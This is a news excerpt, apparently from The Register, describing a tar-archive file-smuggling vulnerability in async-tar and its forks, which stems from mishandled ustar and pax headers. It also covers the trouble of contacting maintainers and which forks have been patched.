"The tar format can support both ustar (Unix Standard TAR) and pax headers, the latter was added as an extension to tar decades ago. When a file entry has both ustar and pax headers, the code advances the stream position based on the ustar size, often zero, rather than the pax size, which should override it. This means it may interpret file content as a tar header, enabling smuggled files."
"The normal disclosure pattern for a vulnerability is that maintainers are informed in advance to create patches before the issue is widely known. In this case, though, there are several important forks of async-tar. The version used by uv is astral-tokio-tar, which, the readme states, "is a fork of edera-dev/tokio-tar, which was a fork of vorot93/tokio-tar, which was a fork of dignifiedquire/async-tar, which is based on alexcrichton/tar-rs.""
"The fork called tokio-tar is the most popular, according to crates.io, with over 7 million downloads, but the Edera team had problems contacting the maintainers of both tokio-tar and async-tar, because "neither project had a SECURITY.md or public contact method," resorting to what it called social engineering and community sleuthing to find the right people. The outcome is that while both async-tar and astral-tokio-tar have been patched, tokio-tar has not."
A header-parsing vulnerability in async-tar allows attackers to hide extra files in tar archives when entries include both ustar and pax headers. The code advances the stream by the ustar size, often zero, instead of the pax size that should override it, causing file content to be misinterpreted as a tar header and enabling smuggled files. Exploitation can enable file overwriting, supply-chain attacks via build systems and package managers, and bypass of bill-of-materials scanning. Multiple forks exist; async-tar and astral-tokio-tar have been patched, but the widely downloaded tokio-tar fork remains unpatched and appears unmaintained.
Read at Theregister
Unable to calculate read time
Collection
[
|
...
]